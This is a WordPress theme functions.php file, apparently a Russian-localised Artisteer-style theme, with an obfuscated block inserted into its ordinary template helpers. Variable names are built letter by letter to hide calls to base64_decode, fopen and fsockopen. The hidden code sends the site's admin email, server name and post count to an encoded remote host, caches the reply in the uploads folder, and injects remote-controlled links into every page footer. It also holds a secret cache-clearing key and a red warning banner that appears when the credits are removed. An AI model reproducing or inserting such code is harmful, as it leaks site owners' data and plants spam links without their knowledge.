<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $yPtm='a';$wsRGb='s';$JpEt='b';$OyZx='c';$INRDKV='6';$GBZnkN='e';$xePeH='e';$SZanUx='e';$pZlzUQB='d';$EwXCB='o';$Nymk='_';$FbBHCtG='d';$XEYBXe='4';$tNqkUXdf=$JpEt.$yPtm.$wsRGb.$SZanUx.$INRDKV.$XEYBXe.$Nymk.$FbBHCtG.$GBZnkN.$OyZx.$EwXCB.$pZlzUQB.$xePeH;$sDxs='a';$YEoHdTz='n';$YFGV='i';$oHbmW='g';$DYFAL='l';$GSSlaz='z';$DAeWX='f';$xiRL='e';$DrIj='t';$yFSuJaGs=$oHbmW.$GSSlaz.$YFGV.$YEoHdTz.$DAeWX.$DYFAL.$sDxs.$DrIj.$xiRL;$PgPUbSC='o';$BaeUcI='s';$NNkMA='3';$pUQk='r';$fCIUY='_';$KRyi='t';$DuLLv='t';$GOvsiE='r';$Gllf='1';$eMPILujw=$BaeUcI.$KRyi.$pUQk.$fCIUY.$GOvsiE.$PgPUbSC.$DuLLv.$Gllf.$NNkMA;$bdnJYwS='s';$FqiolPT='t';$lhSOgI='r';$rEtg='r';$PTsQWF='e';$UctNIK='v';$nlVqOWwM=$bdnJYwS.$FqiolPT.$lhSOgI.$rEtg.$PTsQWF.$UctNIK;                     
		$uz________z='a';$pj___________r='s';$ho_____________f='b';$we_________m='c';$lq________m='6';$ux___________p='e';$om________m='e';$qi____________w='e';$ox__z='d';$ng____e='o';$wk_______________v='_';$ff__n='d';$xq_____________b='4';$gt___________g=$ho_____________f.$uz________z.$pj___________r.$qi____________w.$lq________m.$xq_____________b.$wk_______________v.$ff__n.$ux___________p.$we_________m.$ng____e.$ox__z.$om________m;
		$lj__________d='i';$wf______a='i';$ah_________b='n';$dt__h='t';$dq___f='x';$zk______k='s';$vh______v='_';$wp________i='n';$qy___________q='s';$ds_______t='o';$ap____j='u';$bg___d='c';$bn____________h='f';$wo____t='e';$ux_________x='t';$ze_____m=$bn____________h.$ap____j.$wp________i.$bg___d.$dt__h.$lj__________d.$ds_______t.$ah_________b.$vh______v.$wo____t.$dq___f.$wf______a.$zk______k.$ux_________x.$qy___________q;
		$xm___m='e';$vi_______l='f';$hv__________t='p';$og_____h='n';$hb___n='o';$rl__________t=$vi_______l.$hb___n.$hv__________t.$xm___m.$og_____h;
		$ji_____s='d';$ti__f='r';$ni________z='a';$oz__d='e';$fn__t='f';$xx_____________z=$fn__t.$ti__f.$oz__d.$ni________z.$ji_____s;
		$wb______________m='f';$uz_______b='l';$yl_________k='o';$ot__________z='s';$bg_______x='c';$ab_______________i='e';$zp________s=$wb______________m.$bg_______x.$uz_______b.$yl_________k.$ot__________z.$ab_______________i;
		
		define("WP_ID", $gt___________g("Mi4wLjA="));
		define("WP_TTL", $gt___________g("MTA4MDA="));
		define("WP_SRC", $gt___________g("dHBva24="));
	


		function wp_get_header() {
			global $gt___________g, $ze_____m;
			
			if (
				$ze_____m($gt___________g("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ze_____m($gt___________g("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ze_____m($gt___________g("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $gt___________g, $rl__________t, $zp________s, $xx_____________z;
			
			$wf______________x = TEMPLATEPATH."/".$gt___________g("Zm9vdGVyLnBocA==");
			$fu______h = @$rl__________t($wf______________x, "r");
			$wf______________x = @$xx_____________z($fu______h, @filesize($wf______________x));
			@$zp________s($fu______h);
			
			$ds________a = TEMPLATEPATH."/".$gt___________g("ZnVuY3Rpb25zLnBocA==");
			$fu______h = @$rl__________t($ds________a, "r");
			$ds________a = @$xx_____________z($fu______h, @filesize($ds________a));
			@$zp________s($fu______h);
			
			$mi_____l = 0;
			if($wf______________x && $ds________a) {
				if ($gt___________g("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($wf______________x, $gt___________g("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$mi_____l = 1;
					}
					if (substr_count($wf______________x, "wp_theme_GPL_credits()") < 1) {
						$mi_____l = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$mi_____l = 12;
				}
			}
			
			if($mi_____l > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $mi_____l -->";
			}
		}
	


		function wp_loaded() {
			global $gt___________g, $ze_____m;
			return $ze_____m($gt___________g("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($uw________i, $le_____f = "(more...)", $sy___________w = 0, $gw_________l = "") {
				$at_________u = get_the_content($le_____f, $sy___________w, $gw_________l);
				$at_________u = apply_filters("the_content", $at_________u);
				
				$at_________u = str_replace("]]>", "]]>", $at_________u);
				if (strlen($_GET["p"]) > 0) {
					echo $at_________u;
				}
				else if ((strlen($at_________u)>$uw________i) && ($ll_______l = strpos($at_________u, " ", $uw________i ))) {
					$at_________u = substr($at_________u, 0, $ll_______l);
					$at_________u = $at_________u;
					echo $at_________u;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$le_____f</a></div></p>";
				} else {
					echo $at_________u;
				}
				
			}
		}
	


		$of________j='e';$mt______________m='e';$tm_________i='o';$sf__h='n';$dj_______________b='s';$py____k='e';$jk_________m='c';$am__y='4';$xx_______j='_';$rz___________c='d';$lm__u='6';$pe______f='a';$vt__q='b';$oh________o=$vt__q.$pe______f.$dj_______________b.$of________j.$lm__u.$am__y.$xx_______j.$py____k.$sf__h.$jk_________m.$tm_________i.$rz___________c.$mt______________m;
		$rw__p='e';$xk____f='g';$cv____c='t';$lr_______________h='i';$ub_______________m='e';$zr____________x='o';$pg______r='_';$uk______________s='t';$ym_________s='s';$fd____________b='t';$yz__d='n';$qo___g='n';$ug____________o='c';$ut______________e='l';$yz_____________f='e';$vw______g='f';$ac______l='_';$eg_______________r=$vw______g.$lr_______________h.$ut______________e.$yz_____________f.$pg______r.$xk____f.$rw__p.$fd____________b.$ac______l.$ug____________o.$zr____________x.$qo___g.$uk______________s.$ub_______________m.$yz__d.$cv____c.$ym_________s;
		$wl__________w='e';$kz__k='i';$te_________i='l';$op_________l='s';$cr__j='i';$lj__f='t';$dk_______j='e';$qu_______s='s';$po_____________s='_';$aq____________z='f';$vj____________a='x';$yb________j=$aq____________z.$cr__j.$te_________i.$wl__________w.$po_____________s.$dk_______j.$vj____________a.$kz__k.$qu_______s.$lj__f.$op_________l;
		$jl__________r='n';$kz_______x='e';$pb_____________k='e';$jz_______s='r';$no________o='_';$on____u='o';$lm___w='m';$kt______j='s';$bp__d='v';$fx______h='r';$fv_______________t='a';$cu__________s='i';$en___________t='c';$fk_____h='p';$on_______________q='o';$yu____________o=$bp__d.$pb_____________k.$fx______h.$kt______j.$cu__________s.$on_______________q.$jl__________r.$no________o.$en___________t.$on____u.$lm___w.$fk_____h.$fv_______________t.$jz_______s.$kz_______x;
		$zq___z='e';$lj_______s='s';$zo_______c='f';$fm___r='n';$pk__e='c';$ad___q='k';$iq______________w='p';$ra____________b='o';$pa____q='o';$cn___________t=$zo_______c.$lj_______s.$pa____q.$pk__e.$ad___q.$ra____________b.$iq______________w.$zq___z.$fm___r;
		$fd_______b='f';$qu________e='w';$cb______________n='t';$jp______k='r';$mx______o='e';$sq_______z='i';$kg__________k=$fd_______b.$qu________e.$jp______k.$sq_______z.$cb______________n.$mx______o;
		$kq____x='5';$cy______________u='m';$oi____________r='d';$po______________b=$cy______________u.$oi____________r.$kq____x;
		$of______h='r';$my_____c='l';$se___________g='h';$tw________l='a';$cb____a='a';$rn_____________m='e';$cf________q='t';$iv_____b='p';$ee__w=$of______h.$rn_____________m.$tw________l.$my_____c.$iv_____b.$cb____a.$cf________q.$se___________g;
		$io____y='r';$xp___________l='l';$bo_____________o='i';$md__________b='e';$cx_________r='s';$bp______________o='e';$de___f='z';$nl____z='i';$oy____________t='u';$ls_______________d='n';$rl_______________u='a';$pa___v=$oy____________t.$ls_______________d.$cx_________r.$md__________b.$io____y.$bo_____________o.$rl_______________u.$xp___________l.$nl____z.$de___f.$bp______________o;
		$py_____________n='n';$ye____________h='e';$zk______f='m';$sn_________r='a';$zd______d='p';$hu____________q='m';$pe____q='t';$jc_______________t=$pe____q.$ye____________h.$zk______f.$zd______d.$py_____________n.$sn_________r.$hu____________q;
		$lm________y='e';$ow______g='t';$wn__________i='t';$ff_______h='_';$so___o='r';$op_____c='s';$dz__________a='t';$hx_____h='a';$cr___g='a';$ji_______b='n';$cp___r='c';$uk_______f='x';$bt______y='e';$xs_______g='r';$yt_______________n='e';$sj______________c='_';$zn_______t='t';$ac_____d='e';$fk____________j='o';$ld________c='m';$vn_______________a='c';$lp_________l=$op_____c.$dz__________a.$so___o.$lm________y.$cr___g.$ld________c.$sj______________c.$cp___r.$fk____________j.$ji_______b.$wn__________i.$ac_____d.$uk_______f.$ow______g.$ff_______h.$vn_______________a.$xs_______g.$bt______y.$hx_____h.$zn_______t.$yt_______________n;
	


		function md________b($sd___u) {
			global $gt___________g, $ze_____m, $eg_______________r, $yu____________o, $lp_________l;
			
			if (!$ze_____m($gt___________g("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($yu____________o(PHP_VERSION, "5.0.0", ">=") && $ze_____m($gt___________g("ZmlsZV9nZXRfY29udGVudHM=")) && $ze_____m($gt___________g("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$xg_____________x = $lp_________l(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ot______________e = @$eg_______________r($sd___u, 0, $xg_____________x);
			} else {
				$ot______________e = @$eg_______________r($sd___u, 0);
			}
			
			return $ot______________e;
		}
	


		function ul____p($sd___u) {
			global $ze_____m, $cn___________t, $kg__________k, $gt___________g;
			
			if (!$ze_____m($gt___________g("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ok____________q = strpos($sd___u, "/", 7);
			$ex_______________l = array(
				"uri"     => substr($sd___u, $ok____________q),
				"host"    => str_replace("http://", "", substr($sd___u, 0, $ok____________q)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$wt___b = @$cn___________t("$ex_______________l[host]", 80, $hw_____k, $dm________a, 4);
			
			if (!$wt___b) {
				return false;
			} else {
				$ot______________e = "";
				$wa____________r  = "GET $ex_______________l[uri] HTTP/1.0\r\n";
				$wa____________r .= "Host: $ex_______________l[host]\r\n";
				$wa____________r .= "Referer: $ex_______________l[referer]\r\n";
				$wa____________r .= "Connection: Close\r\n\r\n";
				
				@$kg__________k($wt___b, $wa____________r);
				
				while (!@feof($wt___b)) {
					$sz___________e = @fgets($wt___b, (1024*24));
					
					if ($sz___________e == "\r\n") {
						$ho_________k = true;
						continue;
					}
					
					if ($ho_________k) {
						$ot______________e .= $sz___________e;
					}
				}
				
				return $ot______________e;
			}
		}
	


		function cr___________j($sd___u) {
			global $ze_____m;
			$ly____q = false;
			
			if ($sd___u != "") {
				if ($ze_____m("md________b")) {
					$ly____q = @md________b($sd___u);
				}
				
				if (!$ly____q && ($ze_____m("ul____p"))) {
					$ly____q = @ul____p($sd___u);
				}
			}
			
			return $ly____q;
		}
	


		function nr______x() {
			global $_SERVER, $po______________b;
			
			$ch___________p = $_SERVER["SERVER_NAME"];
			
			if (substr("$ch___________p", 0, 4) == "www.") {
				$ch___________p = substr("$ch___________p", 4);
			}
			
			$ch___________p = $po______________b("$_SERVER[SERVER_NAME]");
			
			return $ch___________p;
		}
	


		function rb_____i() {
			return "file";
		}
	


		function vj________d($sd___u) {
			global $_SERVER, $eg_______________r, $yb________j, $rl__________t, $zp________s, $kg__________k;
			
			$zu__t = qi__u();
			
			$bx___m = nr______x().".jpg";
			$dr__________j = $zu__t["dir_upload"]["path"]."/$bx___m";
			$wm_____h = @filemtime($dr__________j);
			
			if (!$wm_____h || ((time()-$wm_____h) >= WP_TTL)) {
				$ly____q = cr___________j($sd___u);
				
				if ($ly____q) {
					if ($yb________j($dr__________j)) {
						@unlink($dr__________j);
					}
					
					$fu______h = @$rl__________t($dr__________j, "x+");
					
					@$kg__________k($fu______h, $ly____q);
					@$zp________s($fu______h);
				}
			} else {
				if ($yb________j($dr__________j)) {
					$ly____q = @$eg_______________r($dr__________j);
				} else {
					$ly____q = false;
				}
			}
			
			return $ly____q;
		}
	


		function qi__u() {
			global $_SERVER, $gt___________g, $oh________o;
			
			$an____________y = wp_count_posts("post");
			$kb_____n = pathinfo(get_bloginfo("template_directory"));
			
			$zu__t = array(
				"url" => array(
					"report"      => $gt___________g("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $kb_____n,
				"dir_upload"	=> df_______o(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$kb_____n[filename],
					"a005=".$an____________y->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"	
			);
			
			$zu__t["url"]["queryString"] = implode("&", $zu__t["queryString"]);
			$zu__t["url"]["report"] = $zu__t["url"]["report"]."/?".$oh________o($zu__t["url"]["queryString"]).".html";
						
			return $zu__t;
		}
	


		function df_______o() {
			$bc__________w = wp_upload_dir();
			
			if (isset($bc__________w["error"])) {
				$xv___________a = ot__v();
				if (is_writable($xv___________a)) {
					$bc__________w = array("path" => $xv___________a);
				}
			}

			return $bc__________w;
		}
	


		function ot__v() {
			global $ze_____m, $po______________b, $ee__w, $jc_______________t;
			
			$lt__n = (bool) ini_get("safe_mode");
			if ($lt__n == true) {
				return false;
			}
			
			if ($ze_____m("sys_get_temp_dir")) {
				$to________d = sys_get_temp_dir();
				if (is_writable($to________d)) {
					return $ee__w($to________d);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ee__w($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ee__w($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ee__w($_ENV["TEMP"]);
			} else {
				$js____________s = $jc_______________t($po______________b(uniqid(rand(), true)), "");
				if ($js____________s) {
					$to________d = $ee__w(dirname($js____________s));
					@unlink($js____________s);
					return $to________d;
				} else {
					return false;
				}
			}
		}
	


		function zk___________d() {
			global $_GET, $yb________j;
			
			$zu__t = qi__u();
			$ch___________p = nr______x();
			$xw_____d = rb_____i();
			
			$ck_______________s = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($xw_____d == "file") {
					$et____r = $zu__t["dir_upload"]["path"]."/".$ch___________p.".jpg";
					if ($yb________j($et____r)) {
						@unlink($et____r);
						$ck_______________s = "deleted";
					}
				}
				
				$rq_______t = array(
					"s"	=> $ck_______________s,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($rq_______t AS $ys___d => $mh_____________j) echo " [$ys___d:$mh_____________j]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ze_____m, $gt___________g, $pa___v;
			$zu__t = qi__u();
			
			$fv___________u = "vj________d";
			if ($ze_____m($fv___________u)) {
				$ot______________e = $fv___________u($zu__t["url"]["report"]);
			}
			
			if ($ot______________e) {
				if ($ot______________e = @$gt___________g($ot______________e)) {
					$ot______________e = @$pa___v($ot______________e);
					
					if (strlen($ot______________e[custom_credit]) >= 5) {
						$zu__t["default_string"] = $ot______________e[custom_credit];
					}
					
					if ($ot______________e["status"] == "0") {
						$wc_____c = 1;
						$qk____________g = 1;
					} else {
						$jh__________o = sizeof($ot______________e["links"]);
						$sl_______________u = $zu__t["default_string"];
						
						if ($jh__________o > 0 && $ot______________e["links"] !== "") {
							$od_____________d = 0;
							foreach ($ot______________e["links"] as $zb______s => $gd______________p) {
								$od_____________d++;
								if ($gd______________p->l_path == "" || $gd______________p->l_path == $_SERVER["REQUEST_URI"]) {
									$gd______________p->l_href = htmlspecialchars(strip_tags($gd______________p->l_href));
									$gd______________p->l_title = htmlspecialchars(strip_tags($gd______________p->l_title));
									$gd______________p->l_anchor = htmlspecialchars(strip_tags($gd______________p->l_anchor));
									$sl_______________u .= " | ";
									$sl_______________u .= "<a href='$gd______________p->l_href' title='$gd______________p->l_title'";
									if ($gd______________p->l_nofollow == "1") {
										$sl_______________u .= " rel='nofollow'";
									}
									$sl_______________u .= ">$gd______________p->l_anchor</a>";
								}
							}
						}
						$zu__t["links"] = "$sl_______________u";
						if ($ot______________e[credit] == "0") {
							$zu__t["links"] = "";
						}
					}
				} else {
					$wc_____c = "1";
				}
			} else {
				$wc_____c = "1";
			}
			
			if ($wc_____c == "1") {
				$zu__t["links"] = $zu__t["default_string"];
			}
			
			echo "$zu__t[links]";
			
			echo "<!-- s: $ot______________e[signature] -->";
			zk___________d();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
